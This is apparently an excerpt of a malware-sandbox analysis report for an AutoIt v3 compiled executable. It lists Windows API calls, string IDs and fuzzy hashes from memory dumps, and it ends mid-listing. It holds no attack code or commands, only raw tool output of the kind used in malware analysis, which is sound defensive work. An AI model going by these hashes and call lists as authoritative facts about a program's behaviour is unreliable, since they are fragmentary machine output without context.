• SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 001DD4A8
• GetWindowTextW.USER32(00000000,00000000,00000001), ref: 001DD4CF
• InflateRect.USER32(?,000000FD,000000FD), ref: 001DD4ED
• DrawFocusRect.USER32(?,?), ref: 001DD4F8
• GetSysColor.USER32(00000011), ref: 001DD506
• SetTextColor.GDI32(?,00000000), ref: 001DD50E
• DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 001DD522
• SelectObject.GDI32(?,001DD0B5), ref: 001DD539
• DeleteObject.GDI32(?), ref: 001DD544
• SelectObject.GDI32(?,?), ref: 001DD54A
• DeleteObject.GDI32(?), ref: 001DD54F
• SetTextColor.GDI32(?,?), ref: 001DD555
• SetBkColor.GDI32(?,?), ref: 001DD55F
Memory Dump Source
• Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
Similarity
• API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
• String ID:
• API String ID: 1996641542-0
• Opcode ID: 605dcc08b1ad75e3d746645c5d1589bb7f83b03a59537c90b2862e9564af5989
• Instruction ID: 1b9613b202492b4367c87b0cfd9c055a288f6d8f446fbeccc86a3f942b2eca98
• Opcode Fuzzy Hash: 605dcc08b1ad75e3d746645c5d1589bb7f83b03a59537c90b2862e9564af5989
• Instruction Fuzzy Hash: C7511B72900218BFDF119FA8EC48EBE7BBAFB09320F214515F915AB2A1D7759980DB50
APIs
• SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 001DB5C0
• SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 001DB5D1
• CharNextW.USER32(0000014E), ref: 001DB600
• SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 001DB641
• SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 001DB657
• SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 001DB668
• SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 001DB685
• SetWindowTextW.USER32(?,0000014E), ref: 001DB6D7
• SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 001DB6ED
• SendMessageW.USER32(?,00001002,00000000,?), ref: 001DB71E
• _memset.LIBCMT ref: 001DB743
• SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 001DB78C
• _memset.LIBCMT ref: 001DB7EB
• SendMessageW.USER32 ref: 001DB815
• SendMessageW.USER32(?,00001074,?,00000001), ref: 001DB86D
• SendMessageW.USER32(?,0000133D,?,?), ref: 001DB91A
• InvalidateRect.USER32(?,00000000,00000001), ref: 001DB93C
• GetMenuItemInfoW.USER32(?), ref: 001DB986
• SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 001DB9B3
• DrawMenuBar.USER32(?), ref: 001DB9C2
• SetWindowTextW.USER32(?,0000014E), ref: 001DB9EA
Strings
Memory Dump Source
• Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
                                                                                                                              • String ID: 0
                                                                                                                              • API String ID: 1073566785-4108050209
                                                                                                                              • Opcode ID: 6807b4ce2ba39a367cc79e076a623152fb0b9682d31956e6210653992ccb93b1
                                                                                                                              • Instruction ID: 6ca27f8da1b13dd1644475dcf5a7043a8045e6fabd8e43a7a8b010ef400e209c
                                                                                                                              • Opcode Fuzzy Hash: 6807b4ce2ba39a367cc79e076a623152fb0b9682d31956e6210653992ccb93b1
                                                                                                                              • Instruction Fuzzy Hash: 58E17CB1904218EBDF209F91DCC4AFE7BB9EF05714F118156F91AAB290DB708A81DF60
APIs
• GetCursorPos.USER32(?), ref: 001D7587
• GetDesktopWindow.USER32 ref: 001D759C
• GetWindowRect.USER32(00000000), ref: 001D75A3
• GetWindowLongW.USER32(?,000000F0), ref: 001D7605
• DestroyWindow.USER32(?), ref: 001D7631
• CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 001D765A
• SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 001D7678
• SendMessageW.USER32(?,00000439,00000000,00000030), ref: 001D769E
• SendMessageW.USER32(?,00000421,?,?), ref: 001D76B3
• SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 001D76C6
• IsWindowVisible.USER32(?), ref: 001D76E6
• SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 001D7701
• SendMessageW.USER32(?,00000411,00000001,00000030), ref: 001D7715
• GetWindowRect.USER32(?,?), ref: 001D772D
• MonitorFromPoint.USER32(?,?,00000002), ref: 001D7753
• GetMonitorInfoW.USER32 ref: 001D776D
• CopyRect.USER32(?,?), ref: 001D7784
• SendMessageW.USER32(?,00000412,00000000), ref: 001D77EF
Memory Dump Source
• Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
• Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
Similarity
• API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
• String ID: ($0$tooltips_class32
• API String ID: 698492251-4156429822
• Opcode ID: 12956bbbfa0ae69413f3b39d4f0f160f6872019666004346520b3019c932ffa7
• Instruction ID: 5d8e59ecb3ef001bb875812e1974893a46f4ac03d807e920cd5a4b85ba37b965
• Opcode Fuzzy Hash: 12956bbbfa0ae69413f3b39d4f0f160f6872019666004346520b3019c932ffa7
• Instruction Fuzzy Hash: 24B19171608340AFDB04DF64D948B6ABBE5FF88310F00891EF5999B291EB70E845CB92
APIs
• SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 0018A839
• GetSystemMetrics.USER32(00000007), ref: 0018A841
• SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 0018A86C
• GetSystemMetrics.USER32(00000008), ref: 0018A874
• GetSystemMetrics.USER32(00000004), ref: 0018A899
• SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 0018A8B6
• AdjustWindowRectEx.USER32(000000FF,00000000,00000000,00000000), ref: 0018A8C6
• CreateWindowExW.USER32(00000000,AutoIt v3 GUI,?,00000000,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 0018A8F9
• SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 0018A90D
• GetClientRect.USER32(00000000,000000FF), ref: 0018A92B
• GetStockObject.GDI32(00000011), ref: 0018A947
• SendMessageW.USER32(00000000,00000030,00000000), ref: 0018A952
  • Part of subcall function 0018B736: GetCursorPos.USER32(000000FF), ref: 0018B749
  • Part of subcall function 0018B736: ScreenToClient.USER32(00000000,000000FF), ref: 0018B766
  • Part of subcall function 0018B736: GetAsyncKeyState.USER32(00000001), ref: 0018B78B
  • Part of subcall function 0018B736: GetAsyncKeyState.USER32(00000002), ref: 0018B799
• SetTimer.USER32(00000000,00000000,00000028,0018ACEE), ref: 0018A979
Memory Dump Source
• Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
• Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
Similarity
• API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
• String ID: AutoIt v3 GUI
• API String ID: 1458621304-248962490
• Opcode ID: a37df28e2d0181d689602e5b00e5507835a31181738b2925fe65d6c04a6acc09
• Instruction ID: 9139a8b7fee87ddcde50e42d0201d27a697382a65a4e46880e888351a53c35e1
• Opcode Fuzzy Hash: a37df28e2d0181d689602e5b00e5507835a31181738b2925fe65d6c04a6acc09
• Instruction Fuzzy Hash: 3AB15E71A0020AAFEB14EFA8DC45BAD7BB5BF08314F11422AFA1596290DB70D951CF55
APIs
• CharUpperBuffW.USER32(?,?), ref: 001D6A52
• SendMessageW.USER32(?,00001032,00000000,00000000), ref: 001D6B12
Memory Dump Source
• Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
• Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
Similarity
• API ID: BuffCharMessageSendUpper
• String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
• API String ID: 3974292440-719923060
• Opcode ID: 58f82714689a782f80f7a117a2257d1bfaf056700610ff019492aeb6191e90a7
• Instruction ID: 00050ef257fb7789395f148d6dd838c339751ddd6dba60d7d1411105fffb89ef
• Opcode Fuzzy Hash: 58f82714689a782f80f7a117a2257d1bfaf056700610ff019492aeb6191e90a7
• Instruction Fuzzy Hash: 71A170302143019FCB18FF54D851A6AB3A6FF65354F14896EF8969B392DB30ED06CB81
APIs
• GetClassNameW.USER32(?,?,00000100), ref: 001ADD87
• __swprintf.LIBCMT ref: 001ADE28
• _wcscmp.LIBCMT ref: 001ADE3B
• SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 001ADE90
• _wcscmp.LIBCMT ref: 001ADECC
• GetClassNameW.USER32(?,?,00000400), ref: 001ADF03
• GetDlgCtrlID.USER32(?), ref: 001ADF55
• GetWindowRect.USER32(?,?), ref: 001ADF8B
• GetParent.USER32(?), ref: 001ADFA9
• ScreenToClient.USER32(00000000), ref: 001ADFB0
• GetClassNameW.USER32(?,?,00000100), ref: 001AE02A
• _wcscmp.LIBCMT ref: 001AE03E
• GetWindowTextW.USER32(?,?,00000400), ref: 001AE064
• _wcscmp.LIBCMT ref: 001AE078
Memory Dump Source
• Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
• Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
Similarity
• API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf
• String ID: %s%u
• API String ID: 3119225716-679674701
• Opcode ID: d9fb72bc723615c54776d0c5245e93cb311f71fc566f798c5ac0a1423e330adc
• Instruction ID: b4d4ba6449097dd1631e4f446520556d3538a87ad965f4881c42a5fc86d5fb91
• Opcode Fuzzy Hash: d9fb72bc723615c54776d0c5245e93cb311f71fc566f798c5ac0a1423e330adc
• Instruction Fuzzy Hash: B9A1FE75204706AFDB14DF60D884BAAB7E9FF15310F008629F9AAC7190DB30EA46CB91
APIs
• GetClassNameW.USER32(00000008,?,00000400), ref: 001AE6E1
• _wcscmp.LIBCMT ref: 001AE6F2
• GetWindowTextW.USER32(00000001,?,00000400), ref: 001AE71A
• CharUpperBuffW.USER32(?,00000000), ref: 001AE737
• _wcscmp.LIBCMT ref: 001AE755
• _wcsstr.LIBCMT ref: 001AE766
• GetClassNameW.USER32(00000018,?,00000400), ref: 001AE79E
• _wcscmp.LIBCMT ref: 001AE7AE
• GetWindowTextW.USER32(00000002,?,00000400), ref: 001AE7D5
• GetClassNameW.USER32(00000018,?,00000400), ref: 001AE81E
• _wcscmp.LIBCMT ref: 001AE82E
• GetClassNameW.USER32(00000010,?,00000400), ref: 001AE856
• GetWindowRect.USER32(00000004,?), ref: 001AE8BF
Strings
Memory Dump Source
• Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
• Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
Similarity
• API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
• String ID: @$ThumbnailClass
• API String ID: 1788623398-1539354611
APIs
Strings
Similarity
• API ID: __wcsnicmp
• String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
• API String ID: 1038674560-1810252412
APIs
• LoadIconW.USER32(00000063), ref: 001AF8AB
• SendMessageW.USER32(?,00000080,00000000,00000000), ref: 001AF8BD
• SetWindowTextW.USER32(?,?), ref: 001AF8D4
• GetDlgItem.USER32(?,000003EA), ref: 001AF8E9
• SetWindowTextW.USER32(00000000,?), ref: 001AF8EF
• GetDlgItem.USER32(?,000003E9), ref: 001AF8FF
• SetWindowTextW.USER32(00000000,?), ref: 001AF905
• SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 001AF926
• SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 001AF940
• GetWindowRect.USER32(?,?), ref: 001AF949
• SetWindowTextW.USER32(?,?), ref: 001AF9B4
• GetDesktopWindow.USER32 ref: 001AF9BA
• GetWindowRect.USER32(00000000), ref: 001AF9C1
• MoveWindow.USER32(?,?,?,?,00000000,00000000), ref: 001AFA0D
• GetClientRect.USER32(?,?), ref: 001AFA1A
• PostMessageW.USER32(?,00000005,00000000,00000000), ref: 001AFA3F
• SetTimer.USER32(?,0000040A,00000000,00000000), ref: 001AFA6A
Similarity
• API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
• String ID:
• API String ID: 3869813825-0
APIs
• _wcscpy.LIBCMT ref: 001C026A
• _wcschr.LIBCMT ref: 001C0278
• _wcscpy.LIBCMT ref: 001C028F
• _wcscat.LIBCMT ref: 001C029E
• _wcscat.LIBCMT ref: 001C02BC
• _wcscpy.LIBCMT ref: 001C02DD
• __wsplitpath.LIBCMT ref: 001C03BA
• _wcscpy.LIBCMT ref: 001C03DF
• _wcscpy.LIBCMT ref: 001C03F1
• _wcscpy.LIBCMT ref: 001C0406
• _wcscat.LIBCMT ref: 001C041B
• _wcscat.LIBCMT ref: 001C042D
• _wcscat.LIBCMT ref: 001C0442
  • Part of subcall function 001BC890: _wcscmp.LIBCMT ref: 001BC92A
  • Part of subcall function 001BC890: __wsplitpath.LIBCMT ref: 001BC96F
  • Part of subcall function 001BC890: _wcscpy.LIBCMT ref: 001BC982
  • Part of subcall function 001BC890: _wcscat.LIBCMT ref: 001BC995
  • Part of subcall function 001BC890: __wsplitpath.LIBCMT ref: 001BC9BA
  • Part of subcall function 001BC890: _wcscat.LIBCMT ref: 001BC9D0
  • Part of subcall function 001BC890: _wcscat.LIBCMT ref: 001BC9E3
Strings
Similarity
• API ID: _wcscat$_wcscpy$__wsplitpath$_wcschr_wcscmp
• String ID: >>>AUTOIT SCRIPT<<<
• API String ID: 2955681530-2806939583
APIs
• _memset.LIBCMT ref: 001DCD0B
• DestroyWindow.USER32(00000000,?), ref: 001DCD83
  • Part of subcall function 00177E53: _memmove.LIBCMT ref: 00177EB9
• CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 001DCE04
• SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 001DCE26
• SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 001DCE35
• DestroyWindow.USER32(?), ref: 001DCE52
• CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00170000,00000000), ref: 001DCE85
• SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 001DCEA4
• GetDesktopWindow.USER32 ref: 001DCEB9
• GetWindowRect.USER32(00000000), ref: 001DCEC0
• SendMessageW.USER32(00000000,00000418,00000000,?), ref: 001DCED2
• SendMessageW.USER32(00000000,00000421,?,00000000), ref: 001DCEEA
  • Part of subcall function 0018B155: GetWindowLongW.USER32(?,000000EB), ref: 0018B166
Strings
Similarity
• API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memmove_memset
• String ID: 0$tooltips_class32
• API String ID: 1297703922-3619404913
APIs
• VariantInit.OLEAUT32(00000000), ref: 001BB46D
• VariantCopy.OLEAUT32(?,?), ref: 001BB476
• VariantClear.OLEAUT32(?), ref: 001BB482
• VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 001BB561
• __swprintf.LIBCMT ref: 001BB591
• VarR8FromDec.OLEAUT32(?,?), ref: 001BB5BD
• VariantInit.OLEAUT32(?), ref: 001BB63F
• SysFreeString.OLEAUT32(00000016), ref: 001BB6D1
• VariantClear.OLEAUT32(?), ref: 001BB727
• VariantClear.OLEAUT32(?), ref: 001BB736
• VariantInit.OLEAUT32(00000000), ref: 001BB772
Strings
Memory Dump Source
• Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
• Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
Similarity
• API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem__swprintf
• String ID: %4d%02d%02d%02d%02d%02d$Default
• API String ID: 3730832054-3931177956
• Opcode ID: ef3b895e15f24f016369ff035162ce642bc7231e8e80531c14ae496ee1c1c5e3
• Instruction ID: 95e5cb2d18982f6a5281fa7ad4937f8bafda6bf716b948e48266435b8f8ad921
• Opcode Fuzzy Hash: ef3b895e15f24f016369ff035162ce642bc7231e8e80531c14ae496ee1c1c5e3
• Instruction Fuzzy Hash: D1C11071A08215EFCB14DF65D8C4BBAB7B4FF49300F158465E44A9B982DBB0EC80DBA1
APIs
• CharUpperBuffW.USER32(?,?), ref: 001D6FF9
• SendMessageW.USER32(?,00001105,00000000,00000000), ref: 001D7044
Strings
Memory Dump Source
• Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
• Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
Similarity
• API ID: BuffCharMessageSendUpper
• String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
• API String ID: 3974292440-4258414348
• Opcode ID: 9e8062b2dbbf04a64b8fda0b59be1c0fa0a71a6a8d7325762015f6ebb83d7565
• Instruction ID: 434861e3b93e5cafc8b21db1f94343df1ffa5638cc6eb4582b3d98beeef3e982
• Opcode Fuzzy Hash: 9e8062b2dbbf04a64b8fda0b59be1c0fa0a71a6a8d7325762015f6ebb83d7565
• Instruction Fuzzy Hash: 099183342047019FCB18FF14D851A6EB7A2AFA9354F04885DF8965B7D2DB31ED46CB82
APIs
• LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 001DE3BB
• LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,001DBCBF), ref: 001DE417
• LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 001DE457
• LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 001DE49C
• LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 001DE4D3
• FreeLibrary.KERNEL32(?,00000004,?,?,?,?,001DBCBF), ref: 001DE4DF
• ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 001DE4EF
• DestroyCursor.USER32(?), ref: 001DE4FE
• SendMessageW.USER32(?,00000170,00000000,00000000), ref: 001DE51B
• SendMessageW.USER32(?,00000064,00000172,00000001), ref: 001DE527
  • Part of subcall function 00191BC7: __wcsicmp_l.LIBCMT ref: 00191C50
Strings
Memory Dump Source
• Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
• Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
Similarity
• API ID: Load$Image$LibraryMessageSend$CursorDestroyExtractFreeIcon__wcsicmp_l
• String ID: .dll$.exe$.icl
• API String ID: 3907162815-1154884017
• Opcode ID: 3f55492cf1de4371bceb6e4bee210a6ce358caf6d3b33faa5aa5b146ba66f9bc
• Instruction ID: a6e127ed446aeb1c9f1be0aa8e6877810d75945a7449e34004386e5dd31d86bb
• Opcode Fuzzy Hash: 3f55492cf1de4371bceb6e4bee210a6ce358caf6d3b33faa5aa5b146ba66f9bc
• Instruction Fuzzy Hash: EB61CF71940219BEEB14EF64DC46FBE7BB8BB08711F108206F915EA2D0DB74D980DBA0
APIs
• GetLocalTime.KERNEL32(?), ref: 001C0EFF
• SystemTimeToFileTime.KERNEL32(?,?), ref: 001C0F0F
• LocalFileTimeToFileTime.KERNEL32(?,?), ref: 001C0F1B
• __wsplitpath.LIBCMT ref: 001C0F79
• _wcscat.LIBCMT ref: 001C0F91
• _wcscat.LIBCMT ref: 001C0FA3
• GetCurrentDirectoryW.KERNEL32(00000104,?), ref: 001C0FB8
• SetCurrentDirectoryW.KERNEL32(?), ref: 001C0FCC
• SetCurrentDirectoryW.KERNEL32(?), ref: 001C0FFE
• SetCurrentDirectoryW.KERNEL32(?), ref: 001C101F
• _wcscpy.LIBCMT ref: 001C102B
• SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 001C106A
Strings
Memory Dump Source
• Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
• Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
Similarity
• API ID: CurrentDirectoryTime$File$Local_wcscat$System__wsplitpath_wcscpy
• String ID: *.*
• API String ID: 3566783562-438819550
• Opcode ID: d4bd98a446a26d2ef0162ae90c3474290683a2672eb922eecdf51c907c0b5a2b
• Instruction ID: 3cf3039234d3a3779380efc4aae5878a1686853f1153b9012f28ea676ab762f1
• Opcode Fuzzy Hash: d4bd98a446a26d2ef0162ae90c3474290683a2672eb922eecdf51c907c0b5a2b
• Instruction Fuzzy Hash: 6A616FB2504345AFC710EF64C845EAEB7E9FF99310F04891EF98987251EB31EA45CB92
APIs
  • Part of subcall function 001784A6: __swprintf.LIBCMT ref: 001784E5
  • Part of subcall function 001784A6: __itow.LIBCMT ref: 00178519
• CharLowerBuffW.USER32(?,?), ref: 001BDB26
• GetDriveTypeW.KERNEL32 ref: 001BDB73
• mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 001BDBBB
• mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 001BDBF2
• mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 001BDC20
  • Part of subcall function 00177E53: _memmove.LIBCMT ref: 00177EB9
Strings
Memory Dump Source
• Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
• Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmp
